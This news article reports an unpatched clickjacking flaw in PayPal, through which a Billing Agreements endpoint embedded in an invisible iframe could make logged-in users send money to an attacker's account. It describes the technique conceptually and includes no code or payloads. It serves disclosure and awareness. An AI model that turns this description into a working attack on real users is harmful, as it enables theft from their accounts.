A newly discovered unpatched vulnerability in the PayPal money transfer service could enable threat actors to deceive victims into unknowingly completing attacked-controlled transactions. The researchers found the flaw and warned users that they could potentially unwantedly give away their money since the hackers can complete the attack with a single click.
UI redressing, also called clickjacking, is a technique wherein a malicious threat actor deceives an unaware user into clicking a compromised but convincing webpage element. The objective of clickjacking is to download malware, redirect users to a malicious website, and disclose sensitive information.
Threat actors commonly accomplish this attack by displaying an invisible page or HTML element on top of the original page. This technique will result in a scenario where users are tricked into thinking they are accessing the authentic page when accessing the compromised element overlaid on top of the original.
The hijackers’ clicks are meant for the original page and redirect them to another page, which is most likely owned by another domain or application. In addition, the researcher who discovered the flaw stated that the issue was already reported by them to the company in October last year.
PayPal users can unknowingly pay for something that is not within their realisation.
The researcher then explained that the endpoint is created for Billing Agreements only; therefore, it should only accept the BillingAgreementToken. However, the analysis showed that a flaw could pass another token type, and it can lead to money stealing from a PayPal account.
This detail means that a threat actor could attach the endpoint inside an iframe that will cause a victim already logged in to a web browser to transfer funds to a hacker-controlled PayPal account.
Furthermore, the PayPal attack could have had a severe consequence on online portals that integrate with the same checkouts. These consequences could also enable the malicious actor to deduct massive amounts from PayPal users.
Researchers indicated that the vulnerability could also pay other balances using the PayPal account, such as Netflix and other subscription-based apps. There are also online services that can allow the actors to add credit using PayPal.
